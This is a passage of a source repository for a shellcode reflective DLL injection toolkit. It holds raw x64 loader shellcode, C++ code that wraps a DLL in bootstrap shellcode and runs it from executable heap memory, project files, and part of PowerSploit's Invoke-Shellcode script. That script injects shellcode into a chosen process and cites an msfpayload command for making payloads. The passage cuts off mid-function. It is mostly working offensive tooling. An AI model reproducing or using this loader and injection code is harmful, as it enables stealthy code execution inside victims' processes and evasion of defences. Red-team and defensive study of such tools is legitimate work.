\x89\x44\x24\x28\x48\x8D\x54\x24\x20\x45\x33\xC0\x66\x89\x44\x24\x20\x66\x89\x44\x24\x22\x4C\x8B\xCE\x41\xFF\xD4\x48\x83\xC6\x08\x49\x83\xC6\x08\x48\x83\x3E\x00\x74\x07\x48\x8B\x4C\x24\x38\xEB\xA2\x4D\x03\xFD\x41\x8B\x07\x85\xC0\x0F\x85\x70\xFF\xFF\xFF\x44\x8B\xAD\xB8\x00\x00\x00\x45\x33\xFF\x0F\xB7\x77\x14\x45\x8B\xF7\x48\x83\xC6\x28\x41\xBC\x01\x00\x00\x00\x66\x44\x3B\x7F\x06\x0F\x83\xA4\x00\x00\x00\x48\x03\xF7\x45\x8D\x6C\x24\x1F\x44\x39\x3E\x74\x7C\x8B\x46\x14\x
8B\xC8\x81\xE1\x00\x00\x00\x40\x0F\xBA\xE0\x1D\x72\x22\x85\xC9\x75\x0C\x85\xC0\x44\x8D\x41\x08\x45\x0F\x49\xC4\xEB\x33\x41\xB8\x04\x00\x00\x00\x85\xC0\x41\x8D\x40\xFE\x44\x0F\x49\xC0\xEB\x21\x85\xC9\x75\x11\xB9\x10\x00\x00\x00\x85\xC0\x44\x8D\x41\x70\x44\x0F\x49\xC1\xEB\x0C\x85\xC0\x41\xB8\x40\x00\x00\x00\x45\x0F\x49\xC5\x44\x89\x44\x24\x30\xF7\x46\x14\x00\x00\x00\x04\x74\x0A\x41\x0F\xBA\xE8\x09\x44\x89\x44\x24\x30\x8B\x4E\xFC\x4C\x8D\x4C\x24\x30\x8B\x16\x48\x03\xCB\xFF\x55\x00\x0F\xB7\x47\x06\x45\x03\xF4\x48\x83\xC6\x28\x44\x3B\xF0\x0F\x82\x6B\xFF\xFF\xFF\x44\x8B\xAD\xB8\x00\x00\x00\x45\x33\xC0\x33\xD2\x48\x83\xC9\xFF\xFF\x55\x08\x44\x39\xBF\xD4\x00\x00\x00\x74\x24\x8B\x87\xD0\x00\x00\x00\x48\x8B\x74\x18\x18\xEB\x0F\x45\x33\xC0\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x48\x8D\x76\x08\x48\x8B\x06\x48\x85\xC0\x75\xE9\x4C\x8B\x4D\x18\x4D\x85\xC9\x74\x2F\x8B\x87\xA4\x00\x00\x00\x85\xC0\x74\x25\x8B\xC8\x4C\x8B\xC3\x48\xB8\xAB\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x48\xF7\xE1\x8B\x8F\xA0\x00\x00\x00\x48\xC1\xEA\x03\x48\x03\xCB\x41\x2B\xD4\x41\xFF\xD1\x8B\x47\x28\x4D\x8B\xC4\x48\x03\xC3\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x45\x85\xED\x0F\x84\xBB\x00\x00\x00\x44\x39\xBF\x8C\x00\x00\x00\x0F\x84\xAE\x00\x00\x00\x8B\x8F\x88\x00\x00\x00\x48\x03\xCB\x44\x8B\x59\x18\x45\x85\xDB\x0F\x84\x98\x00\x00\x00\x44\x39\x79\x14\x0F\x84\x8E\x00\x00\x00\x44\x8B\x49\x20\x41\x8B\xFF\x8B\x51\x24\x4C\x03\xCB\x48\x03\xD3\x45\x85\xDB\x74\x79\x45\x8B\x01\x45\x8B\xD7\x4C\x03\xC3\x74\x6E\x41\x8A\x00\x84\xC0\x74\x1E\x4D\x03\xC4\x0F\xBE\xC0\x44\x03\xD0\x41\xC1\xCA\x0D\x41\x8A\x00\x84\xC0\x75\xEC\x45\x3B\xEA\x75\x05\x48\x85\xD2\x75\x12\x41\x03\xFC\x49\x83\xC1\x04\x48\x83\xC2\x02\x41\x3B\xFB\x73\x39\xEB\xBE\x8B\x41\x1C\x0F\xB7\x0A\x48\x03\xC3\x44\x8B\x04\x88\x4C\x03\xC3\xF6\x85\xD8\x00\x00\x00\x08\x74\x0E\x48\x8B\x8D\xD0\x00\x00\x00\xBA\x08\x00\x00\x00\xEB\x0D\x8B\x95\xC8\x00\x00\x00\x48\x8B\x8D\xC0\x00\x00\x00\x41\xFF\xD0\x48\x8B\xC3\xEB\x02\x33\xC0\x48\x8B\x9C\x24\xB0\x01\x00\x00\x48\x81\xC4\x70\x01\x00\x00\x41\x5F\x41\x5E\x
41\x5D\x41\x5C\x5F\x5E\x5D\xC3\x48\x8B\xC4\x48\x89\x58\x08\x48\x89\x68\x10\x48\x89\x70\x18\x48\x89\x78\x20\x41\x56\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x8B\xE9\x45\x33\xF6\x48\x8B\x50\x18\x4C\x8B\x52\x10\x4D\x8B\x42\x30\x4D\x85\xC0\x0F\x84\xB7\x00\x00\x00\x41\x0F\x10\x42\x58\x49\x63\x40\x3C\x41\x8B\xD6\x4D\x8B\x12\xF3\x0F\x7F\x04\x24\x46\x8B\x9C\x00\x88\x00\x00\x00\x45\x85\xDB\x74\xD2\x48\x8B\x04\x24\x48\xC1\xE8\x10\x66\x44\x3B\xF0\x73\x22\x48\x8B\x4C\x24\x08\x44\x0F\xB7\xC8\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xE9\x01\x75\xE7\x4B\x8D\x3C\x18\x44\x8B\x4F\x18\x8B\x47\x20\x41\xFF\xC9\x49\x03\xC0\x4A\x8D\x34\x88\xEB\x28\x8B\x1E\x45\x8B\xDE\x49\x03\xD8\x48\x8D\x76\xFC\x0F\xBE\x0B\x48\xFF\xC3\x41\xC1\xCB\x0D\x44\x03\xD9\x84\xC9\x75\xEF\x41\x8D\x04\x13\x3B\xC5\x74\x0E\x41\xFF\xC9\x41\x83\xF9\x01\x77\xD2\xE9\x58\xFF\xFF\xFF\x8B\x47\x24\x43\x8D\x0C\x09\x49\x03\xC0\x0F\xB7\x14\x01\x8B\x4F\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x6C\x24\x28\x48\x8B\x74\x24\x30\x48\x8B\x7C\x24\x38\x48\x83\xC4\x10\x41\x5E\xC3";
111 | DWORD rdiShellcode32Length = 2981, rdiShellcode64Length = 2772;
112 | //MARKER:E
113 | #endif
114 |
115 | if (Is64BitDLL((UINT_PTR)inBytes))
116 | {
117 |
118 | rdiShellcode = rdiShellcode64;
119 | rdiShellcodeLength = rdiShellcode64Length;
120 |
121 | if (rdiShellcode == NULL || rdiShellcodeLength == 0) return 0;
122 |
123 | BYTE bootstrap[69] = { 0 };
124 | DWORD i = 0;
125 |
126 | // call next instruction (Pushes next instruction address to stack)
127 | bootstrap[i++] = 0xe8;
128 | bootstrap[i++] = 0x00;
129 | bootstrap[i++] = 0x00;
130 | bootstrap[i++] = 0x00;
131 | bootstrap[i++] = 0x00;
132 |
133 | // Set the offset to our DLL from pop result
134 | dllOffset = sizeof(bootstrap) - i + rdiShellcodeLength;
135 |
136 | // pop rcx - Capture our current location in memory
137 | bootstrap[i++] = 0x59;
138 |
139 | // mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
140 | bootstrap[i++] = 0x49;
141 | bootstrap[i++] = 0x89;
142 | bootstrap[i++] = 0xc8;
143 |
144 | // mov edx,
145 | bootstrap[i++] = 0xba;
146 | MoveMemory(bootstrap + i, &userFunction, sizeof(userFunction));
147 | i += sizeof(userFunction);
148 |
149 | // Setup the location of our user data
150 | // add r8, +
151 | bootstrap[i++] = 0x49;
152 | bootstrap[i++] = 0x81;
153 | bootstrap[i++] = 0xc0;
154 | userDataLocation = dllOffset + length;
155 | MoveMemory(bootstrap + i, &userDataLocation, sizeof(userDataLocation));
156 | i += sizeof(userDataLocation);
157 |
158 | // mov r9d,
159 | bootstrap[i++] = 0x41;
160 | bootstrap[i++] = 0xb9;
161 | MoveMemory(bootstrap + i, &userLength, sizeof(userLength));
162 | i += sizeof(userLength);
163 |
164 | // push rsi - save original value
165 | bootstrap[i++] = 0x56;
166 |
167 | // mov rsi, rsp - store our current stack pointer for later
168 | bootstrap[i++] = 0x48;
169 | bootstrap[i++] = 0x89;
170 | bootstrap[i++] = 0xe6;
171 |
172 | // and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
173 | bootstrap[i++] = 0x48;
174 | bootstrap[i++] = 0x83;
175 | bootstrap[i++] = 0xe4;
176 | bootstrap[i++] = 0xf0;
177 |
178 | // sub rsp, 0x30 - Create some breathing room on the stack
179 | bootstrap[i++] = 0x48;
180 | bootstrap[i++] = 0x83;
181 | bootstrap[i++] = 0xec;
182 | bootstrap[i++] = 6 * 8; // 32 bytes for shadow space + 16 bytes for last args
183 |
184 | // mov qword ptr [rsp + 0x28], rcx (shellcode base) - Push in arg 5
185 | bootstrap[i++] = 0x48;
186 | bootstrap[i++] = 0x89;
187 | bootstrap[i++] = 0x4C;
188 | bootstrap[i++] = 0x24;
189 | bootstrap[i++] = 5 * 8;
190 |
191 | // add rcx,
192 | bootstrap[i++] = 0x48;
193 | bootstrap[i++] = 0x81;
194 | bootstrap[i++] = 0xc1;
195 | MoveMemory(bootstrap + i, &dllOffset, sizeof(dllOffset));
196 | i += sizeof(dllOffset);
197 |
198 | // mov dword ptr [rsp + 0x20], - Push arg 6 just above shadow space
199 | bootstrap[i++] = 0xC7;
200 | bootstrap[i++] = 0x44;
201 | bootstrap[i++] = 0x24;
202 | bootstrap[i++] = 4 * 8;
203 | MoveMemory(bootstrap + i, &flags, sizeof(flags));
204 | i += sizeof(flags);
205 |
206 | // call - Transfer execution to the RDI
207 | bootstrap[i++] = 0xe8;
208 | bootstrap[i++] = sizeof(bootstrap) - i - 4; // Skip over the remainder of instructions
209 | bootstrap[i++] = 0x00;
210 | bootstrap[i++] = 0x00;
211 | bootstrap[i++] = 0x00;
212 |
213 | // mov rsp, rsi - Reset our original stack pointer
214 | bootstrap[i++] = 0x48;
215 | bootstrap[i++] = 0x89;
216 | bootstrap[i++] = 0xf4;
217 |
218 | // pop rsi - Put things back where we left them
219 | bootstrap[i++] = 0x5e;
220 |
221 | // ret - return to caller
222 | bootstrap[i++] = 0xc3;
223 |
224 | // Ends up looking like this in memory:
225 | // Bootstrap shellcode
226 | // RDI shellcode
227 | // DLL bytes
228 | // User data
229 | outLength = length + userLength + rdiShellcodeLength + sizeof(bootstrap);
230 | outBytes = (LPSTR)malloc(outLength);
231 | MoveMemory(outBytes, bootstrap, sizeof(bootstrap));
232 | MoveMemory(outBytes + sizeof(bootstrap), rdiShellcode, rdiShellcodeLength);
233 | MoveMemory(outBytes + sizeof(bootstrap) + rdiShellcodeLength, inBytes, length);
234 | MoveMemory(outBytes + sizeof(bootstrap) + rdiShellcodeLength + length, userData, userLength);
235 |
236 | }
237 | else { // 32 bit
238 |
239 | rdiShellcode = rdiShellcode32;
240 | rdiShellcodeLength = rdiShellcode32Length;
241 |
242 | if (rdiShellcode == NULL || rdiShellcodeLength == 0) return 0;
243 |
244 | BYTE bootstrap[50] = { 0 };
245 | DWORD i = 0;
246 |
247 | // call next instruction (Pushes next instruction address to stack)
248 | bootstrap[i++] = 0xe8;
249 | bootstrap[i++] = 0x00;
250 | bootstrap[i++] = 0x00;
251 | bootstrap[i++] = 0x00;
252 | bootstrap[i++] = 0x00;
253 |
254 | // Set the offset to our DLL from pop result
255 | dllOffset = sizeof(bootstrap) - i + rdiShellcodeLength;
256 |
257 | // pop eax - Capture our current location in memory
258 | bootstrap[i++] = 0x58;
259 |
260 | // push ebp
261 | bootstrap[i++] = 0x55;
262 |
263 | // move ebp, esp
264 | bootstrap[i++] = 0x89;
265 | bootstrap[i++] = 0xe5;
266 |
267 | // mov edx, eax - copy our location in memory to ebx before we start modifying eax
268 | bootstrap[i++] = 0x89;
269 | bootstrap[i++] = 0xc2;
270 |
271 | // add edx, +
272 | bootstrap[i++] = 0x81;
273 | bootstrap[i++] = 0xc2;
274 | userDataLocation = dllOffset + length;
275 | MoveMemory(bootstrap + i, &userDataLocation, sizeof(userDataLocation));
276 | i += sizeof(userDataLocation);
277 |
278 | // push
279 | bootstrap[i++] = 0x68;
280 | MoveMemory(bootstrap + i, &flags, sizeof(flags));
281 | i += sizeof(flags);
282 |
283 | // push eax
284 | bootstrap[i++] = 0x50;
285 |
286 | // push
287 | bootstrap[i++] = 0x68;
288 | MoveMemory(bootstrap + i, &userLength, sizeof(userLength));
289 | i += sizeof(userLength);
290 |
291 | // push edx
292 | bootstrap[i++] = 0x52;
293 |
294 | // push
295 | bootstrap[i++] = 0x68;
296 | MoveMemory(bootstrap + i, &userFunction, sizeof(userFunction));
297 | i += sizeof(userFunction);
298 |
299 | // add eax,
300 | bootstrap[i++] = 0x05;
301 | MoveMemory(bootstrap + i, &dllOffset, sizeof(dllOffset));
302 | i += sizeof(dllOffset);
303 |
304 | // push eax
305 | bootstrap[i++] = 0x50;
306 |
307 | // call - Transfer execution to the RDI
308 | bootstrap[i++] = 0xe8;
309 | bootstrap[i++] = sizeof(bootstrap) - i - 4; // Skip the remainder of instructions
310 | bootstrap[i++] = 0x00;
311 | bootstrap[i++] = 0x00;
312 | bootstrap[i++] = 0x00;
313 |
314 | // add esp, 0x14 - clean up stack from args (cdecl)
315 | bootstrap[i++] = 0x83;
316 | bootstrap[i++] = 0xc4;
317 | bootstrap[i++] = 0x14;
318 |
319 | // leave
320 | bootstrap[i++] = 0xc9;
321 |
322 | // ret - return to caller
323 | bootstrap[i++] = 0xc3;
324 |
325 | // Ends up looking like this in memory:
326 | // Bootstrap shellcode
327 | // RDI shellcode
328 | // DLL bytes
329 | // User data
330 | outLength = length + userLength + rdiShellcodeLength + sizeof(bootstrap);
331 | outBytes = (LPSTR)malloc(outLength);
332 | MoveMemory(outBytes, bootstrap, sizeof(bootstrap));
333 | MoveMemory(outBytes + sizeof(bootstrap), rdiShellcode, rdiShellcodeLength);
334 | MoveMemory(outBytes + sizeof(bootstrap) + rdiShellcodeLength, inBytes, length);
335 | MoveMemory(outBytes + sizeof(bootstrap) + rdiShellcodeLength + length, userData, userLength);
336 | }
337 |
338 | return true;
339 | }
340 |
// Function-pointer shapes used by main() below.
// RDI: entry of the sRDI blob. main() casts the blob's first byte to this type,
//      calls it with no arguments and treats the UINT_PTR result as an HMODULE.
typedef UINT_PTR(WINAPI * RDI)();
// Function: shape of the "Uninstall" export that main() resolves via GetProcAddressR().
typedef void(WINAPI * Function)();
// EXPORTEDFUNCTION: not referenced in main(); presumably the shape of an export that
// receives a (buffer, length) pair -- its call site is not in this excerpt, confirm before relying on it.
typedef BOOL(__cdecl * EXPORTEDFUNCTION)(LPVOID, DWORD);
344 |
// Test harness for the sRDI conversion and loader path.
//
// argv[1] names an input file. If it starts with "MZ" it is treated as a DLL and
// first run through ConvertToShellcode(); otherwise it is assumed to already be a
// finished sRDI blob and is executed unchanged. Every path returns 0; failures are
// reported only through printf().
//
// Behaviour worth knowing when reviewing or monitoring this tool: the blob is
// executed straight from a heap buffer after VirtualProtect() marks its first page
// PAGE_EXECUTE_READWRITE, and the export of the loaded module is resolved with the
// project's GetProcAddressR() rather than GetProcAddress() (presumably because the
// module is not registered with the loader -- confirm against GetProcAddressR's definition).
// envp is unused.
int main(int argc, char *argv[], char *envp[])
{
LPSTR finalShellcode = NULL, data = NULL;
// Both sizes are filled in by callees (GetFileContents / ConvertToShellcode) and are
// only read on the success paths of those calls. finalSize is written but never read here.
DWORD finalSize, dataSize;
DWORD dwOldProtect1 = 0; // previous protection of the first page, returned by VirtualProtect; never restored
SYSTEM_INFO sysInfo;

// For any MessageBox testing in the blob
// NOTE(review): `test` is never used or released after this point.
HMODULE test = LoadLibraryA("User32.dll");

if (argc < 2) {
// NOTE(review): both NativeLoader.exe lines print with no argument placeholder after them;
// an angle-bracketed argument was presumably lost in extraction -- confirm against the repository.
printf("\n[!] Usage:\n\n\tNativeLoader.exe \n\tNativeLoader.exe \n");
return 0;
}
// dataSize is passed by name and must be set by the callee, so it is presumably a reference
// out-parameter -- TODO confirm GetFileContents' signature.
if (!GetFileContents(argv[1], &data, dataSize)) {
printf("\n[!] Failed to load file\n");
return 0;
}

// NOTE(review): data[1] is read without first checking that dataSize >= 2.
if (data[0] == 'M' && data[1] == 'Z') {
printf("[+] File is a DLL, attempting to convert\n");

// Arguments: the DLL bytes and their length, the hash of the export to invoke after
// loading, a 5-byte user-data buffer ("dave" and its terminating NUL), the
// SRDI_CLEARHEADER flag, and two out-parameters receiving the new blob and its length.
// ConvertToShellcode() allocates a fresh buffer for finalShellcode (see its malloc of
// outBytes), so `data` is never freed on this path.
if (!ConvertToShellcode(data, dataSize, HashFunctionName("SayHello"), "dave", 5, SRDI_CLEARHEADER, finalShellcode, finalSize)) {
printf("[!] Failed to convert DLL\n");
return 0;
}

printf("[+] Successfully Converted\n");
}
else {
// Not a PE image: run the file as an already-built sRDI blob.
finalShellcode = data;
finalSize = dataSize;
}

GetNativeSystemInfo(&sysInfo);

// Only set the first page to RWX
// This is should sufficiently cover the sRDI shellcode up top
// (finalSize is not consulted here; exactly dwPageSize bytes from the buffer start are changed.)
if (VirtualProtect(finalShellcode, sysInfo.dwPageSize, PAGE_EXECUTE_READWRITE, &dwOldProtect1)) {
RDI rdi = (RDI)(finalShellcode);

printf("[+] Executing RDI\n");
HMODULE hLoadedDLL = (HMODULE)rdi(); // Excute DLL

// NOTE(review): in the non-DLL branch this frees the buffer returned by GetFileContents();
// that is only correct if the helper allocated it with malloc() -- confirm.
free(finalShellcode); // Free the RDI blob. We no longer need it.

// NOTE(review): hLoadedDLL is not NULL-checked; whether GetProcAddressR() tolerates NULL is not visible here.
Function exportedFunction = (Function)GetProcAddressR(hLoadedDLL, "Uninstall");
if (exportedFunction) {
printf("[+] Calling exported functon\n"); // NOTE(review): message has a typo ("functon"); left unchanged here
exportedFunction();
}
}
// NOTE(review): a VirtualProtect() failure falls through to `return 0` without any message.

return 0;
}
400 |
401 |
--------------------------------------------------------------------------------
/Native/Native.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {68293519-3053-4AB6-921F-9690E2E1487F}
23 | Win32Proj
24 | RDIShellcodeCLoader
25 | 10.0
26 | Native
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | true
78 |
79 |
80 | false
81 |
82 |
83 | false
84 |
85 |
86 |
87 |
88 |
89 | Level3
90 | Disabled
91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | MultiThreadedDebug
93 |
94 |
95 | Console
96 | true
97 |
98 |
99 | copy /y "$(TargetPath)" "$(SolutionDir)bin\NativeLoader_x86.exe"
100 |
101 |
102 |
103 |
104 |
105 |
106 | Level3
107 | Disabled
108 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
109 | MultiThreadedDebug
110 |
111 |
112 | Console
113 | true
114 |
115 |
116 | copy /y "$(TargetPath)" "$(SolutionDir)bin\NativeLoader_x64.exe"
117 |
118 |
119 |
120 |
121 | Level3
122 |
123 |
124 | MaxSpeed
125 | true
126 | true
127 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
128 |
129 |
130 | Console
131 | true
132 | true
133 | true
134 |
135 |
136 | copy /y "$(TargetPath)" "$(SolutionDir)bin\NativeLoader_x86.exe"
137 |
138 |
139 |
140 |
141 | Level3
142 |
143 |
144 | MaxSpeed
145 | true
146 | true
147 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
148 |
149 |
150 | Console
151 | true
152 | true
153 | true
154 |
155 |
156 | copy /y "$(TargetPath)" "$(SolutionDir)bin\NativeLoader_x64.exe"
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
--------------------------------------------------------------------------------
/Native/Native.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Native/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // RDIShellcodeCLoader.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Native/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/Native/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/PowerShell/Invoke-Shellcode.ps1:
--------------------------------------------------------------------------------
1 | function Invoke-Shellcode
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
7 |
8 | PowerSploit Function: Invoke-Shellcode
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Portions of this project were based upon syringe.c v1.2, written by Spencer McIntyre
17 |
18 | PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
19 |
20 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
21 |
22 | Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary.
23 |
24 | .PARAMETER ProcessID
25 |
26 | Process ID of the process you want to inject shellcode into.
27 |
28 | .PARAMETER Shellcode
29 |
30 | Specifies an optional shellcode passed in as a byte array
31 |
32 | .PARAMETER Force
33 |
34 | Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
35 |
36 | .EXAMPLE
37 |
38 | C:\PS> Invoke-Shellcode -ProcessId 4274
39 |
40 | Description
41 | -----------
42 | Inject shellcode into process ID 4274.
43 |
44 | .EXAMPLE
45 |
46 | C:\PS> Invoke-Shellcode
47 |
48 | Description
49 | -----------
50 | Inject shellcode into the running instance of PowerShell.
51 |
52 | .EXAMPLE
53 |
54 | C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
55 |
56 | Description
57 | -----------
58 | Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
59 | Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit!
60 | #>
61 |
62 | [CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param (
63 | [ValidateNotNullOrEmpty()]
64 | [UInt16]
65 | $ProcessID,
66 |
67 | [Parameter( ParameterSetName = 'RunLocal' )]
68 | [ValidateNotNullOrEmpty()]
69 | [Byte[]]
70 | $Shellcode,
71 |
72 | [Switch]
73 | $Force = $False
74 | )
75 |
76 | Set-StrictMode -Version 2.0
77 |
78 | if ( $PSBoundParameters['ProcessID'] )
79 | {
80 | # Ensure a valid process ID was provided
81 | # This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive
82 | Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null
83 | }
84 |
# Builds a delegate [Type] at runtime with the requested parameter and return types,
# using Reflection.Emit instead of Add-Type (no compiler invocation, nothing written to
# disk). The type lives in an in-memory dynamic assembly named 'ReflectedDelegate'.
# Intended for pairing an unmanaged function pointer with a callable signature; the
# consumer of the returned type is outside this excerpt.
#
# Parameters:
#   $Parameters - parameter types of the delegate's Invoke method (default: none)
#   $ReturnType - return type of the delegate (default: [Void])
# Output: the newly created delegate [Type], written to the pipeline.
function Local:Get-DelegateType
{
    Param
    (
        [OutputType([Type])]

        [Parameter( Position = 0)]
        [Type[]]
        $Parameters = (New-Object Type[](0)),

        [Parameter( Position = 1 )]
        [Type]
        $ReturnType = [Void]
    )

    $Domain = [AppDomain]::CurrentDomain
    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
    # AssemblyBuilderAccess::Run: the assembly can be executed but not saved.
    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
    # A delegate is a sealed class derived from MulticastDelegate whose constructor and
    # Invoke method are runtime-provided ('Runtime, Managed'), so no IL body is emitted.
    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
    $MethodBuilder.SetImplementationFlags('Runtime, Managed')

    Write-Output $TypeBuilder.CreateType()
}
112 |
# Resolves the address of an export in a module that is already loaded in this process.
# Rather than declaring P/Invoke signatures, it reflects into the internal
# Microsoft.Win32.UnsafeNativeMethods class of System.dll, which already wraps
# GetModuleHandle and GetProcAddress.
#
# Parameters:
#   $Module    - module name handed to GetModuleHandle (e.g. 'kernel32.dll'). GetModuleHandle
#                does not load modules, so the module must already be present in the process.
#   $Procedure - name of the export to look up.
# Output: the export address as an [IntPtr]; IntPtr.Zero when GetProcAddress finds nothing.
function Local:Get-ProcAddress
{
    Param
    (
        [OutputType([IntPtr])]

        [Parameter( Position = 0, Mandatory = $True )]
        [String]
        $Module,

        [Parameter( Position = 1, Mandatory = $True )]
        [String]
        $Procedure
    )

    # Get a reference to System.dll in the GAC
    # NOTE(review): only a GAC-loaded System.dll matches; if nothing matches, $SystemAssembly is
    # $null and the GetType call below fails with a method-on-null error rather than a clear message.
    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
    # Get a reference to the GetModuleHandle and GetProcAddress methods
    # The explicit parameter-type list selects the (HandleRef, string) overload of GetProcAddress.
    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
    # Get a handle to the module specified
    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
    # Wrap the raw handle in a HandleRef, the type the selected overload expects.
    $tmpPtr = New-Object IntPtr
    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)

    # Return the address of the function
    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}
143 |
# Emits a shellcode stub that when injected will create a thread and pass execution to the main shellcode payload
#
# Parameters:
#   $BaseAddr       - address the stub calls into (where the payload was written)
#   $ExitThreadAddr - address of ExitThread, called with argument 0 after the payload returns
#   $Architecture   - pointer width in bits; 64 selects the x64 encoding, any other value the x86 one
# Output: the stub as a [Byte[]]. Both addresses are embedded as absolute little-endian values.
function Local:Emit-CallThreadStub ([IntPtr] $BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Architecture)
{
    # Pointer width in bytes (8 or 4).
    $IntSizePtr = $Architecture / 8

    # Converts an address to little-endian bytes at the pointer width of the enclosing
    # function; $IntSizePtr is read from the parent scope.
    function Local:ConvertTo-LittleEndian ([IntPtr] $Address)
    {
        $LittleEndianByteArray = New-Object Byte[](0)
        # Zero-pad to two hex digits per byte, split into byte pairs (the regex capture keeps
        # them, the empty separators are skipped), parse each, then reverse to little-endian.
